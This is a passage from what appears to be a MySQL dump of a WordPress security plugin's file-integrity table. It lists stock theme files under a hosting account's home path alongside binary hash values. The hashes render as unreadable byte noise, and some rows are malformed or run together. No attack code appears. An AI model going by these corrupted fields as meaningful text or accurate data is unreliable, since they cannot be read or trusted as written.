k\Z\"','ՙda1,69%ef;V5+','',0,'?'),('497Tb~~','wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w@8+^1','\n< ~J&,\nkxrͷ78ɜٜr','',0,'?'),(' |aV~[f.','wp-content/themes/twentynineteen/package-lock.json','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/package-lock.json',0,'c*Xqdۍյ?U\"$lz','',0,'?'),('6:$4-Tg5 ','wp-content/themes/twentynineteen/sass/elements/_lists.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/elements/_lists.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','= L`򊘖B[','V\"\ZkYcnUkYY$-,y\r','',0,'?'),('#V(k]$(','wp-content/themes/twentynineteen/sass/elements/_tables.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/elements/_tables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\"MY~','lGw}V>%{n\\z;','',0,'?'),(' 1_E67','wp-content/themes/twentynineteen/sass/forms/_buttons.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/forms/_buttons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a|2]e\"$9z','\0Ó\rƱ6 ,J !d7nh','',0,'?'),('pCy) {','wp-content/themes/twentynineteen/sass/forms/_fields.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/forms/_fields.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}6r _','H (XJN5\\<*m\0\r4','',0,'?'),('UN, \\1','wp-content/themes/twentynineteen/sass/forms/_forms.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/forms/_forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%nŋA','hVC{B{4Ob]=;X)(X','',0,'?'),('\"-Ѳ\n2j%(o','wp-content/themes/twentynineteen/sass/layout/_layout.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/layout/_layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!&\"{#*','v@.|s>0OA3jA','',0,'?'),('scEvO8','wp-content/themes/twentynineteen/sass/media/_captions.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/media/_captions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'^__]EM\'so','-Ln@A!@f','',0,'?'),('mCB.ե>F_#','wp-content/themes/twentynineteen/sass/media/_galleries.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/media/_galleries.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kmd~','6!1oAuEoFw9\n4\0\\%wM\rg','',0,'?'),('\rduQnk','wp-content/themes/twentynineteen/sass/media/_media.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/media/_media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<2Q.%|=S','$?2sȉFG?TC?EkBf S','',0,'?'),('Ӱ@p 5xP','wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kzܲy9bY','N1.MJOrYrؾvߑc!','',0,'?'),('̵%0i2','wp-content/themes/twentynineteen/sass/mixins/_utilities.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/mixins/_utilities.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&7','/Cܰ/ŏ@XY!C','',0,'?'),('?C!Ӳ','wp-content/themes/twentynineteen/sass/modules/_accessibility.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/modules/_accessibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VUvRd#Wgq',' P\03Msl/)Pʻ=]','',0,'?'),('Ǽ=/%@6Dn','wp-content/themes/twentynineteen/sass/modules/_alignments.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/modules/_alignments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3\\sӳR]iO','̰簃bp4iшB6A','',0,'?'),('=m^ D6W','wp-content/themes/twentynineteen/sass/modules/_clearings.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/modules/_clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vYP \\;4','s3s=#q˞< I\'r&','',0,'?'),('X\0TO','wp-content/themes/twentynineteen/sass/navigation/_links.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_links.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' h, pA','\04݌^\ZYi_O_#','',0,'?'),('?UBwN i','wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fp4g','x8o1bprp','',0,'?'),('/Mn(sv','wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9;Tpeu#.S','^R|7^ )4(5;','',0,'?'),('[:Sh ˸','wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']<1!\0o','#@^=}l5@Wsa #a V','',0,'?'),('#z1h;','wp-content/themes/twentynineteen/sass/navigation/_navigation.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tx߰+e=SF','5, nRjtݑʦ/','',0,'?'),('[̉$\'','wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɚu\\ ','cV xy(#il8L}e޷','',0,'?'),(' lq1Ti','wp-content/themes/twentynineteen/sass/site/_site.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/_site.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S@* D/\\I','XmW MKtV8Ɗ','',0,'?'),('#QCw3eX9','wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\07','@UJL$)\ZO\\|bS|oR˜','',0,'?'),('0$\'`Õ n\\','wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&!<Tp+','Iʌ ?(5]]FrA~{tJ? ','',0,'?'),('O~LȦ\"f~| ;','wp-content/themes/twentynineteen/sass/site/header/_site-header.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/header/_site-header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_n.)U\\!k ','1,0љLv/\r>%\"','',0,'?'),('~`Wj|iLI=','wp-content/themes/twentynineteen/sass/site/primary/_archives.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/primary/_archives.scss',0,'\njq@hD)r','\njq@hD)r','ho3U ~n6>i~M#','',0,'?'),('\\FZ7i','wp-content/themes/twentynineteen/sass/site/primary/_comments.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/primary/_comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5xsT[n ','D\r q}cpIa \"CĻ','',0,'?'),('8ՠ)j,z','wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss',0,' HB-L\'gAq',' HB-L\'gAq','vɘ(f]A?pAR\ZaƁ& A9\r[2','',0,'?'),(':6de\'O','wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޕ헣WӹXRG','\0pcIqU)8','',0,'?'),('뻛Ib,6Y+8:','wp-content/themes/twentynineteen/sass/typography/_copy.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/typography/_copy.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nLر^#*s','+\\`F~)?9G}B1','',0,'?'),('Z@EyaB','wp-content/themes/twentynineteen/sass/typography/_headings.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/typography/_headings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Rsx*%','pЎ(W\\ c36\0\'f','',0,'?'),('W׾5^l__#','wp-content/themes/twentynineteen/sass/typography/_typography.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/typography/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>72nt','neko@l_ky~YWŢA','',0,'?'),('B_-Th+`äR','wp-content/themes/twentynineteen/sass/variables-site/_colors.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Nx\\\rv/','tGք2\ZF]aYJbp','',0,'?'),('s]Pf\n','wp-content/themes/twentynineteen/sass/variables-site/_columns.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_columns.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':+<>3K','w0̃|^;YmnLi24','',0,'?'),('GM.','wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss',0,'xY iF욤yG','xY iF욤yG',' Z{L GNJ\n ⪋','',0,'?'),('_B\0rpIu','wp-content/themes/twentynineteen/sass/variables-site/_structure.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/sass/variables-site/_structure.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O!Yr8ܗt/','=\0td\nJeܐZ','wp-content/themes/twentynineteen/style-editor.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style-editor.scss',0,'\0h3p0bnu','\0h3p0bnu','lsr&){ΖYPzs{','',0,'?'),('&?.\rs;=9','wp-content/themes/twentynineteen/style-rtl.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style-rtl.css',0,'IW8\'\Z<`R*','IW8\'\Z<`R*','I_.魟CNgB @jT','',0,'?'),('s(:ӣ$\r','wp-content/themes/twentynineteen/style.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style.css',0,'t-:g%w`JX;)','t-:g%w`JX;)','k-FYLs0S$`3\'','',0,'?'),('BK@~&^8','wp-content/themes/twentynineteen/style.scss','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/style.scss',0,'v:^2 0D}ۮ','v:^2 0D}ۮ','uJs26PXhy&8<=','',0,'?'),('>v]{rq6x','wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X<*Um4F','`>K˘JN\r@¥Y09C','',0,'?'),('Lw+$4|nsw','wp-content/themes/twentynineteen/template-parts/content/content-none.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content-none.php',0,';I\0:Yz',';I\0:Yz','\\ءeA0?\0}̥qJY\ZF','',0,'?'),('`V\\9','wp-content/themes/twentynineteen/template-parts/content/content-page.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content-page.php',0,'Mj3כ;x>','Mj3כ;x>','Pǣܗ>$>W~773WqŰ','',0,'?'),('w (\'sy:6','wp-content/themes/twentynineteen/template-parts/content/content-single.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content-single.php',0,'Gt -T','Gt -T','`Dr$\r:\"D\Z!@2x{A+','',0,'?'),('[B^ Z1','wp-content/themes/twentynineteen/template-parts/content/content.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/content/content.php',0,'ۥ9G Yf','ۥ9G Yf','mu1]E^Z_|l\" q','',0,'?'),('9ĠZq:j\nU9(\Z\0','wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e9 |[>','P+;9L/6: ѭ . ^Z','',0,'?'),('`o\'c? / ','wp-content/themes/twentynineteen/template-parts/header/entry-header.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/header/entry-header.php',0,'*^t\Zp\Z-A','*^t\Zp\Z-A','L<~[]ĶJ\rln[!','',0,'?'),('\rV2P-+x@','wp-content/themes/twentynineteen/template-parts/header/site-branding.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Zmoë垅','B.T\Z{1>c?+{ΤYAv','',0,'?'),('[ R','wp-content/themes/twentynineteen/template-parts/post/author-bio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/post/author-bio.php',0,'7.g&\\ikm','7.g&\\ikm','BZJ}P{w vW@','',0,'?'),('\" .}}X1\Z','wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php',0,'ha..؞\\','ha..؞\\','!nX\n D!Ao%j=m[<;0','',0,'?'),('%)\r\'','wp-content/themes/twentyseventeen/404.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OxA$1&-y','H{Af,[$dn›','',0,'?'),('aq+^JUS','wp-content/themes/twentyseventeen/archive.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*qw( 4YMQ9+','Dإη ێ}L $:n8Yހ','',0,'?'),('IY{N#败bcP','wp-content/themes/twentyseventeen/assets/css/blocks.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/blocks.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Jyڗ?aR]I\"N','rheUCs\0VÝ7?[\0f[-~','',0,'?'),('A[,#V^j','wp-content/themes/twentyseventeen/assets/css/colors-dark.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/colors-dark.css',0,' -p^\\G',' -p^\\G','lx,tayqi7r|\\V','',0,'?'),('5xsS&','wp-content/themes/twentyseventeen/assets/css/editor-blocks.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/editor-blocks.css',0,'I**~F\'#1J','I**~F\'#1J','0ܩ! L(\"`xf1QJ ','',0,'?'),('gt.H*W=C','wp-content/themes/twentyseventeen/assets/css/editor-style.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U6\0Zy$Y*','rƊxA+Alӱag._nZ','',0,'?'),('Pp4!Iai','wp-content/themes/twentyseventeen/assets/css/ie8.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/ie8.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/eCQkuCwv','q AVIB₏.;\0s`jM','',0,'?'),('[0|2Ŷ','wp-content/themes/twentyseventeen/assets/css/ie9.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/css/ie9.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ց[Y\0 ','\Z.| ؤ(=16ƚMϸ-\nGk','',0,'?'),('{mѡMYm|;F','wp-content/themes/twentyseventeen/assets/images/coffee.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/coffee.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AޞEoe P;b','\\lϸv{z2?H9l Mt#er[','',0,'?'),('T_T-xE&8','wp-content/themes/twentyseventeen/assets/images/espresso.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/espresso.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p)=c#|','edGKs,vE A4\\\0o7)','',0,'?'),('{A7?\0\Z.','wp-content/themes/twentyseventeen/assets/images/header.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0C EK>5|‹Q','|%`}3?M±KXWMEX','',0,'?'),('4:5~ǒM','wp-content/themes/twentyseventeen/assets/images/sandwich.jpg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/sandwich.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j\nv759','QzХj@|9^.l?2ܞ','',0,'?'),('tj-RO','wp-content/themes/twentyseventeen/assets/images/svg-icons.svg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/images/svg-icons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jbآ@)-J','̞w\nPeÅR$BRnR#','',0,'?'),('ǥc\Z$L*u','wp-content/themes/twentyseventeen/assets/js/customize-controls.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/customize-controls.js',0,'%ˁ+Ѽ53L','%ˁ+Ѽ53L','\nW+\r39Nυf?F','',0,'?'),(';&_XI%;','wp-content/themes/twentyseventeen/assets/js/customize-preview.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',3IpK18','^+5iMY0ȚKFdkI4','',0,'?'),('TQaP\0?򢣡H','wp-content/themes/twentyseventeen/assets/js/global.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/assets/js/global.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',x3|l ',' Ѥ\\ 4uho\Zb%xA','',0,'?'),('sό?BnBdM<:S{','',0,'?'),('{9\\\'Ylv:','wp-content/themes/twentyseventeen/sidebar.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cx(Z%p4>','ᮈXjtcIA1lhRTʀ]\"X','',0,'?'),(':,~PLEI\\','wp-content/themes/twentyseventeen/single.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z{6cvЃ\\,','>}O_ +}?tsW][:','',0,'?'),('g?~*5@Ɖr1','wp-content/themes/twentyseventeen/style.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/style.css',0,'CHb=7I[?','CHb=7I[?','Z}i,LFsBZI=41','',0,'?'),('jeb= ','wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~V2:5AY-','r1BMSDАy&.3xR*g0','',0,'?'),('r2ÁXzeb/','wp-content/themes/twentyseventeen/template-parts/footer/site-info.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/footer/site-info.php',0,'Rkt','Rkt','ҽb\rKsuT{~e. ','',0,'?'),('蓶Fշ !c','wp-content/themes/twentyseventeen/template-parts/header/header-image.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/header/header-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!u:L1','KtZ.o/ZGpy@1C\";a:','',0,'?'),('KiEurKږM','wp-content/themes/twentyseventeen/template-parts/header/site-branding.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r%F29&','ҍ||ò+W$UV{r','',0,'?'),('|mN~lEJߣ7','wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/navigation/navigation-top.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@omdd',' XGП}ߛ1GhD+s<','',0,'?'),('>*;','wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/page/content-front-page-panels.php',0,'O9ʏCZ\0n,gZ','O9ʏCZ\0n,gZ',';j¨9~ǚpOQKU.x?`\'','',0,'?'),('2ni\0D2Mh','wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/page/content-front-page.php',0,'5汩M\\-4YJ','5汩M\\-4YJ',' ʝh/w\\\\2wc*;/Hθ>l','',0,'?'),('\0ifP+ܠI','wp-content/themes/twentyseventeen/template-parts/page/content-page.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/page/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>|)}X9Z\ny?+','C8%(@i=5&\Zc^[Co[eeW0)','',0,'?'),('ˮ\0(Չ','wp-content/themes/twentyseventeen/template-parts/post/content-audio.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-audio.php',0,'7LxGt[z','7LxGt[z','vPBSrJ-3Q[} X5}c','',0,'?'),('Tw4|R','wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9ɢ<@Y','ʖiu\0603+$mX_δ8W O~','',0,'?'),('D\rT1','wp-content/themes/twentyseventeen/template-parts/post/content-gallery.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-gallery.php',0,'1V(;','1V(;','![0J\06\Zj6\\?\0.k','',0,'?'),('B\nODt%','wp-content/themes/twentyseventeen/template-parts/post/content-image.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-image.php',0,'71&:q\ni ','71&:q\ni ','xGր3 Xy%\'3 4\"9I.','',0,'?'),('1Fb3}!Q[dۗ','wp-content/themes/twentyseventeen/template-parts/post/content-none.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-none.php',0,'TG?.{','TG?.{','*@X1iᰣ+kOOR8\rkʌn','',0,'?'),('6_zTU','wp-content/themes/twentyseventeen/template-parts/post/content-video.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content-video.php',0,'}!G\\ 0]','}!G\\ 0]','VJJdHER_ 82O','',0,'?'),('RJ٥DcvցK','wp-content/themes/twentyseventeen/template-parts/post/content.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentyseventeen/template-parts/post/content.php',0,'*7eLr','*7eLr',' h.5h0w\"ۖ2LlX\nCpÐ =','',0,'?'),('ٹӃ2HAYfM#m','wp-content/themes/twentysixteen/404.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8ȗG@= /6(\r','/Ì>=Um `!98jC3]aff]f','',0,'?'),('Ӎ?K %Q6$3','wp-content/themes/twentysixteen/archive.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*g!NB\n','\rVog uD!rbR','',0,'?'),('z7,D\Z2㭉M','wp-content/themes/twentysixteen/comments.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/comments.php',0,'Ua;[b\\','Ua;[b\\','}n\02 (2)d>ƁeK;nCs','',0,'?'),('-f[?шZ','wp-content/themes/twentysixteen/css/blocks.css','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/css/blocks.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y@&ICm','=','4+_[qpv,{l','',0,'?'),('9}몟!\Z\r','wp-content/themes/twentysixteen/genericons/Genericons.svg','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')ld*Zb','(5\\&HFI7l24=}`jV Bj4)','',0,'?'),('Ex\"GC~2Jŕs','wp-content/themes/twentysixteen/genericons/Genericons.ttf','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/Genericons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\' N깛V','?ǵ_-ϟb7b\Z \' fp>UG\0','',0,'?'),('sy- AXQg','wp-content/themes/twentysixteen/genericons/Genericons.woff','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';(H-Jhtx',';m}e(~y0m=},','',0,'?'),('TfP%,5H4','wp-content/themes/twentysixteen/genericons/LICENSE.txt','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4MiHjJBc','\0v1sN>cID٦I0-','',0,'?'),('#q[\nhK+8mx','wp-content/themes/twentysixteen/genericons/README.md','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/genericons/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6V\0','ҕRw&8Jie@)~Oz','LF\"= *F_Oy{J*v ','',0,'?'),('Ml/Aq۷-','wp-content/themes/twentysixteen/js/customize-preview.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Ap$գJT','hjt\n:W6T','',0,'?'),('D&ME*ީS','wp-content/themes/twentysixteen/js/functions.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/functions.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^xRf?','9}!\'m@{y','',0,'?'),('58Ryx*','wp-content/themes/twentysixteen/js/html5.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^鐐{1P\'`K','Ry1Nhu¿I}؞)i','',0,'?'),('>#wtE7','wp-content/themes/twentysixteen/js/keyboard-image-navigation.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/keyboard-image-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']\'\'/W',')4vo$E(v9DF\rU','',0,'?'),('Mލ,Tv\Z\0\0(U','wp-content/themes/twentysixteen/js/skip-link-focus-fix.js','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"B!H1涭/Ps','Q+oBVjᝄSFGZҾ','',0,'?'),('π 3Ӱ !&','wp-content/themes/twentysixteen/page.php','/home/tummmyov/tummyrevolution.com/wp-content/themes/twentysixteen/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7up/\"',' 